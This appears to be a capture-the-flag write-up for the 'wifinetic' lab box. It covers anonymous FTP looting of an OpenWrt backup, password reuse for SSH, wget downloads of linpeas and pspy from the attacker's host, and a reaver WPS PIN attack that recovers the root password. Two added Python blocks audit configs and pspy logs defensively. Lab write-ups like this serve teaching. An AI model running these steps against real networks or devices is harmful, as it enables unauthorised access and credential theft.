
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-05 09:32 KST
NSOCK ERROR [0.0670s] ssl_init_helper(): OpenSSL legacy provider failed to load.
Nmap scan report for 10.10.11.247
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.14.5
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
| -rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
| -rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
| -rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
|_-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
| 256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_ 256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
53/tcp open tcpwrapped
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.94 seconds
Port scan result: there is no web service, but FTP is open. Anonymous login is also allowed.
> lftp 10.10.11.247
lftp 10.10.11.247:~> ls
-rw-r--r-- 1 ftp ftp 4434 Jul 31 11:03 MigrateOpenWrt.txt
-rw-r--r-- 1 ftp ftp 2501210 Jul 31 11:03 ProjectGreatMigration.pdf
-rw-r--r-- 1 ftp ftp 60857 Jul 31 11:03 ProjectOpenWRT.pdf
-rw-r--r-- 1 ftp ftp 40960 Sep 11 15:25 backup-OpenWrt-2023-07-26.tar
-rw-r--r-- 1 ftp ftp 52946 Jul 31 11:03 employees_wellness.pdf
The PDF and txt documents don't seem to contain anything special, so I analyzed the tar file. It contains system files.
total 104
drwxr-xr-x 19 sangsoon.park staff 608 10 5 09:56 .
drwxr-xr-x 10 sangsoon.park staff 320 10 5 09:56 ..
-rw-r--r--@ 1 sangsoon.park staff 6148 10 5 09:56 .DS_Store
drwxr-xr-x 12 sangsoon.park staff 384 9 12 00:22 config
drwxr-xr-x 4 sangsoon.park staff 128 9 12 00:22 dropbear
-rw-r--r-- 1 sangsoon.park staff 227 7 26 19:08 group
-rw-r--r-- 1 sangsoon.park staff 110 4 28 05:28 hosts
-rw-r--r-- 1 sangsoon.park staff 183 4 28 05:28 inittab
drwxr-xr-x 3 sangsoon.park staff 96 9 12 00:22 luci-uploads
drwxr-xr-x 4 sangsoon.park staff 128 9 12 00:22 nftables.d
drwxr-xr-x 3 sangsoon.park staff 96 9 12 00:22 opkg
-rw-r--r-- 1 sangsoon.park staff 420 7 26 19:09 passwd
-rw-r--r-- 1 sangsoon.park staff 1046 4 28 05:28 profile
-rw-r--r-- 1 sangsoon.park staff 132 4 28 05:28 rc.local
-rw-r--r-- 1 sangsoon.park staff 9 4 28 05:28 shells
-rw-r--r-- 1 sangsoon.park staff 475 4 28 05:28 shinit
-rw-r--r-- 1 sangsoon.park staff 80 4 28 05:28 sysctl.conf
-rw-r--r-- 1 sangsoon.park staff 745 7 25 04:15 uhttpd.crt
-rw-r--r-- 1 sangsoon.park staff 121 7 25 04:15 uhttpd.key
Looking at passwd, the user appears to be netadmin. Since port 22 is open on the server, it looks like I need to get into the server with that account somehow.
root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
ntp:x:123:123:ntp:/var/run/ntp:/bin/false
dnsmasq:x:453:453:dnsmasq:/var/run/dnsmasq:/bin/false
logd:x:514:514:logd:/var/run/logd:/bin/false
ubus:x:81:81:ubus:/var/run/ubus:/bin/false
netadmin:x:999:999::/home/netadmin:/bin/false
While browsing the files, I noticed that the wireless file inside the config directory contains a key value. Could this be the password?
cat wireless
config wifi-device 'radio0'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim0'
option cell_density '0'
option channel 'auto'
option band '2g'
option txpower '20'
config wifi-device 'radio1'
option type 'mac80211'
option path 'virtual/mac80211_hwsim/hwsim1'
option channel '36'
option band '5g'
option htmode 'HE80'
option cell_density '0'
config wifi-iface 'wifinet0'
option device 'radio0'
option mode 'ap'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
option wps_pushbutton '1'
config wifi-iface 'wifinet1'
option device 'radio1'
option mode 'sta'
option network 'wwan'
option ssid 'OpenWrt'
option encryption 'psk'
option key 'VeRyUniUqWiFIPasswrd1!'
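The two findings that matter in this file are the plaintext PSK and the WPS push-button flag on the AP section (that flag is what the reaver step later in this writeup relies on). The following is an added example, not code from the original post: a small parser for the UCI `config`/`option` format used by OpenWrt, with an audit that flags every stored `key` and every AP with `wps_pushbutton '1'`. The sample input is constructed from the sections shown above plus one made-up clean section (`wifinet2`) for contrast.

```python
"""Audit an OpenWrt UCI wireless config for plaintext keys and WPS.

Added example, not from the original post. It parses the UCI
"config <type> '<name>'" / "option <k> '<v>'" format of config/wireless
and reports (a) every 'key' option, i.e. a plaintext PSK that ends up in
any backup of the device, and (b) any AP section with wps_pushbutton
enabled, which exposes the network to WPS PIN recovery.
"""
import re
from typing import Dict, List

# Constructed sample: the wifinet0/wifinet1 sections from the backup,
# plus a hypothetical 'wifinet2' section that is clean, for contrast.
SAMPLE_WIRELESS = """
config wifi-device 'radio0'
    option type 'mac80211'
    option channel 'auto'

config wifi-iface 'wifinet0'
    option device 'radio0'
    option mode 'ap'
    option ssid 'OpenWrt'
    option encryption 'psk'
    option key 'VeRyUniUqWiFIPasswrd1!'
    option wps_pushbutton '1'

config wifi-iface 'wifinet1'
    option device 'radio1'
    option mode 'sta'
    option ssid 'OpenWrt'
    option encryption 'psk'
    option key 'VeRyUniUqWiFIPasswrd1!'

config wifi-iface 'wifinet2'
    option device 'radio1'
    option mode 'ap'
    option ssid 'Guest'
    option encryption 'sae'
    option wps_pushbutton '0'
"""

_CONFIG_RE = re.compile(r"^\s*config\s+(\S+)(?:\s+'([^']*)')?\s*$")
_OPTION_RE = re.compile(r"^\s*option\s+(\S+)\s+'([^']*)'\s*$")


def parse_uci(text: str) -> List[Dict[str, str]]:
    """Parse UCI text into a list of sections. Each section is a dict with
    '_type' and '_name' plus its options. Lines that are neither 'config'
    nor 'option' (blank lines, comments, 'list' entries) are skipped."""
    sections: List[Dict[str, str]] = []
    for line in text.splitlines():
        m = _CONFIG_RE.match(line)
        if m:
            sections.append({"_type": m.group(1), "_name": m.group(2) or ""})
            continue
        m = _OPTION_RE.match(line)
        if m and sections:
            sections[-1][m.group(1)] = m.group(2)
    return sections


def audit_wireless(text: str) -> List[str]:
    """Return one finding per problem, in file order."""
    findings: List[str] = []
    for s in parse_uci(text):
        if s["_type"] != "wifi-iface":
            continue
        name = s["_name"] or "<unnamed>"
        ssid = s.get("ssid", "")
        if "key" in s:
            findings.append(f"{name}: plaintext key for ssid '{ssid}' stored in config")
        if s.get("mode") == "ap" and s.get("wps_pushbutton") == "1":
            findings.append(f"{name}: WPS push-button enabled on AP '{ssid}'")
    return findings


if __name__ == "__main__":
    for finding in audit_wireless(SAMPLE_WIRELESS):
        print(finding)
```

Run against a real backup with `audit_wireless(open("etc/config/wireless").read())`; the same parser works for any UCI file, so the check can be extended to other config files in the archive.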
Trying it over SSH... it was correct.
ssh netadmin@10.10.11.247
The authenticity of host '10.10.11.247 (10.10.11.247)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.247' (ED25519) to the list of known hosts.
netadmin@10.10.11.247's password:
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-162-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Thu 05 Oct 2023 01:01:22 AM UTC
System load: 0.0
Usage of /: 64.2% of 4.76GB
Memory usage: 6%
Swap usage: 0%
Processes: 227
Users logged in: 0
IPv4 address for eth0: 10.10.11.247
IPv6 address for eth0: dead:beef::250:56ff:feb9:8732
IPv4 address for wlan0: 192.168.1.1
IPv4 address for wlan1: 192.168.1.23
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
Expanded Security Maintenance for Applications is not enabled.
0 updates can be applied immediately.
Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Tue Sep 12 12:46:00 2023 from 10.10.14.23
netadmin@wifinetic:~$ id
uid=1000(netadmin) gid=1000(netadmin) groups=1000(netadmin)
netadmin@wifinetic:~$
Since it's an easy box, it took less than 5 minutes.
I checked the sudo privileges, but there was nothing of note. So let's run linpeas, pspy64, find, and so on.
My PC > python3 -m http.server
Download on the server
netadmin@wifinetic:~$ wget 10.10.14.5:8000/pspy64
--2023-10-05 01:08:57-- http://10.10.14.5:8000/pspy64
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[===================================================================================================================================================================================================>] 2.96M 1.15MB/s in 2.6s
2023-10-05 01:09:00 (1.15 MB/s) - ‘pspy64’ saved [3104768/3104768]
netadmin@wifinetic:~$ wget 10.10.14.5:8000/linpeas.sh
--2023-10-05 01:09:05-- http://10.10.14.5:8000/linpeas.sh
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765826 (748K) [application/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[===================================================================================================================================================================================================>] 747.88K 556KB/s in 1.3s
2023-10-05 01:09:07 (556 KB/s) - ‘linpeas.sh’ saved [765826/765826]
find / -perm 4000 2>/dev/null : nothing unusual.
linpeas.sh : nothing notable.
pspy : suspicious activity as root (/bin/bash /usr/local/bin/wps_check.sh)
2023/10/05 01:41:14 CMD: UID=0 PID=21705 | /usr/bin/systemctl restart wpa_supplicant.service
2023/10/05 01:41:14 CMD: UID=0 PID=21706 | /sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant.conf -i wlan1
2023/10/05 01:41:14 CMD: UID=0 PID=21716 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21715 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21714 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21713 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21712 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21711 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21710 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21709 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21708 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21707 | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0 PID=21718 | /bin/bash /usr/local/bin/wps_check.sh
2023/10/05 01:41:14 CMD: UID=0 PID=21719 | /bin/bash /usr/local/bin/wps_check.sh
2023/10/05 01:41:14 CMD: UID=0 PID=21720 | sleep 5
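What stands out in that pspy capture is a root-owned timer repeatedly running an interpreted script from /usr/local/bin. The following is an added example, not part of the original post: it parses pspy's `CMD: UID=... PID=... | ...` lines, counts distinct root-run command lines, and flags those where an interpreter executes a script from a non-package path. The path list and interpreter set are this example's own heuristic (assumptions, not anything pspy provides), and the sample is constructed from the lines above plus one made-up non-root line.

```python
"""Triage pspy output: which command lines run as root, and which of those
are interpreted scripts living outside package-managed paths?

Added example, not from the original post. Input lines have the form
'YYYY/MM/DD HH:MM:SS CMD: UID=<n> PID=<n> | <command line>'.
"""
import os
import re
from collections import Counter
from typing import List, Tuple

PSPY_RE = re.compile(r"^(\S+ \S+) CMD: UID=(\d+)\s+PID=(\d+)\s+\|\s+(.*)$")

# Heuristic (assumption of this example): interpreters whose script argument
# we inspect, and directories where root-run scripts deserve a closer look.
INTERPRETERS = {"bash", "sh", "dash", "python", "python3", "perl"}
WATCH_PREFIXES = ("/usr/local/", "/opt/", "/home/", "/tmp/", "/var/tmp/")

# Constructed sample: a subset of the pspy lines in the writeup, plus one
# made-up UID=1000 line to show that non-root activity is not flagged.
SAMPLE_PSPY = """\
2023/10/05 01:41:14 CMD: UID=0    PID=21705  | /usr/bin/systemctl restart wpa_supplicant.service
2023/10/05 01:41:14 CMD: UID=0    PID=21706  | /sbin/wpa_supplicant -u -s -c /etc/wpa_supplicant.conf -i wlan1
2023/10/05 01:41:14 CMD: UID=0    PID=21716  | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0    PID=21715  | /lib/systemd/systemd-udevd
2023/10/05 01:41:14 CMD: UID=0    PID=21718  | /bin/bash /usr/local/bin/wps_check.sh
2023/10/05 01:41:14 CMD: UID=0    PID=21719  | /bin/bash /usr/local/bin/wps_check.sh
2023/10/05 01:41:14 CMD: UID=0    PID=21720  | sleep 5
2023/10/05 01:41:20 CMD: UID=1000 PID=21730  | /bin/bash /home/netadmin/linpeas.sh
"""


def parse_pspy(text: str) -> List[Tuple[str, int, int, str]]:
    """Return (timestamp, uid, pid, cmdline) for each well-formed pspy line."""
    out: List[Tuple[str, int, int, str]] = []
    for line in text.splitlines():
        m = PSPY_RE.match(line.strip())
        if m:
            out.append((m.group(1), int(m.group(2)), int(m.group(3)), m.group(4).strip()))
    return out


def root_commands(text: str) -> Counter:
    """Count how often each distinct command line was seen running as UID 0
    (insertion order is the order of first appearance)."""
    return Counter(cmd for _, uid, _, cmd in parse_pspy(text) if uid == 0)


def flag_root_scripts(text: str) -> List[str]:
    """Distinct root-run command lines where an interpreter executes a script
    located under one of WATCH_PREFIXES."""
    flagged: List[str] = []
    for cmd in root_commands(text):
        argv = cmd.split()
        if len(argv) < 2 or os.path.basename(argv[0]) not in INTERPRETERS:
            continue
        if any(arg.startswith(WATCH_PREFIXES) for arg in argv[1:]):
            flagged.append(cmd)
    return flagged


if __name__ == "__main__":
    for cmd, n in root_commands(SAMPLE_PSPY).items():
        print(f"{n:3d}  {cmd}")
    print("flagged:", flag_root_scripts(SAMPLE_PSPY))
```

Feed it a saved pspy log (`flag_root_scripts(open("pspy.log").read())`) to get the short list of root-run scripts worth reviewing for permissions and content, rather than reading the full stream by eye.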
Looking at the system itself, there was nothing to find. I tried to look at the conf file, but I don't have permission to read it.
Since Wi-Fi related processes keep coming up, I checked the network information.
ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.247 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 dead:beef::250:56ff:feb9:8732 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:8732 prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:87:32 txqueuelen 1000 (Ethernet)
RX packets 11539 bytes 4761182 (4.7 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 9096 bytes 4399254 (4.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 10423 bytes 625648 (625.6 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 10423 bytes 625648 (625.6 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
mon0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec 02-00-00-00-02-00-30-3A-00-00-00-00-00-00-00-00 txqueuelen 1000 (UNSPEC)
RX packets 45723 bytes 8049722 (8.0 MB)
RX errors 0 dropped 45723 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.1 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:0 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:00:00 txqueuelen 1000 (Ethernet)
RX packets 1530 bytes 144584 (144.5 KB)
RX errors 0 dropped 209 overruns 0 frame 0
TX packets 1796 bytes 208450 (208.4 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.23 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::ff:fe00:100 prefixlen 64 scopeid 0x20<link>
ether 02:00:00:00:01:00 txqueuelen 1000 (Ethernet)
RX packets 462 bytes 63550 (63.5 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1530 bytes 172124 (172.1 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
wlan2: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
ether 02:00:00:00:02:00 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions
> iwconfig
wlan0 IEEE 802.11 Mode:Master Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
mon0 IEEE 802.11 Mode:Monitor Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
wlan2 IEEE 802.11 ESSID:off/any
Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
eth0 no wireless extensions.
wlan1 IEEE 802.11 ESSID:"OpenWrt"
Mode:Managed Frequency:2.412 GHz Access Point: 02:00:00:00:00:00
Bit Rate:24 Mb/s Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
Link Quality=70/70 Signal level=-30 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:8 Missed beacon:0
hwsim0 no wireless extensions.
As you can see, mon0 is in monitor mode. So I need to use monitor mode to crack WPS, but I can't use sudo... While I was feeling stuck, I found that a certain tool existed on the server.
netadmin@wifinetic:~$ reaver
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
Required Arguments:
-i, --interface=<wlan> Name of the monitor-mode interface to use
-b, --bssid=<mac> BSSID of the target AP
Optional Arguments:
-m, --mac=<mac> MAC of the host system
-e, --essid=<ssid> ESSID of the target AP
-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)
-s, --session=<file> Restore a previous session file
-C, --exec=<command> Execute the supplied command upon successful pin recovery
-f, --fixed Disable channel hopping
-5, --5ghz Use 5GHz 802.11 channels
-v, --verbose Display non-critical warnings (-vv or -vvv for more)
-q, --quiet Only display critical messages
-h, --help Show help
Advanced Options:
-p, --pin=<wps pin> Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
-d, --delay=<seconds> Set the delay between pin attempts [1]
-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]
-g, --max-attempts=<num> Quit after num pin attempts
-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]
-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts
-t, --timeout=<seconds> Set the receive timeout period [10]
-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.40]
-A, --no-associate Do not associate with the AP (association must be done by another application)
-N, --no-nacks Do not send NACK messages when out of order packets are received
-S, --dh-small Use small DH keys to improve crack speed
-L, --ignore-locks Ignore locked state reported by the target AP
-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet
-J, --timeout-is-nack Treat timeout as NACK (DIR-300/320)
-F, --ignore-fcs Ignore frame checksum errors
-w, --win7 Mimic a Windows 7 registrar [False]
-K, --pixie-dust Run pixiedust attack
-Z Run pixiedust attack
Example:
reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv
Using this to attempt a crack, a PSK came out. Probably the root password?
netadmin@wifinetic:~$ reaver -i mon0 -b 02:00:00:00:00:00 -vv
Reaver v1.6.5 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
[+] Waiting for beacon from 02:00:00:00:00:00
[+] Switching mon0 to channel 1
[+] Received beacon from 02:00:00:00:00:00
[+] Trying pin "12345670"
[+] Sending authentication request
[!] Found packet with bad FCS, skipping...
[+] Sending association request
[+] Associated with 02:00:00:00:00:00 (ESSID: OpenWrt)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 2 seconds
[+] WPS PIN: '12345670'
[+] WPA PSK: 'WhatIsRealAnDWhAtIsNot51121!'
[+] AP SSID: 'OpenWrt'
[+] Nothing done, nothing to save.
I solved it, but I was a bit disappointed, feeling that the privilege escalation was somewhat contrived.
netadmin@wifinetic:~$ su root
Password:
root@wifinetic:/home/netadmin# cd ~
root@wifinetic:~# ls
root.txt snap
root@wifinetic:~# cat root.txt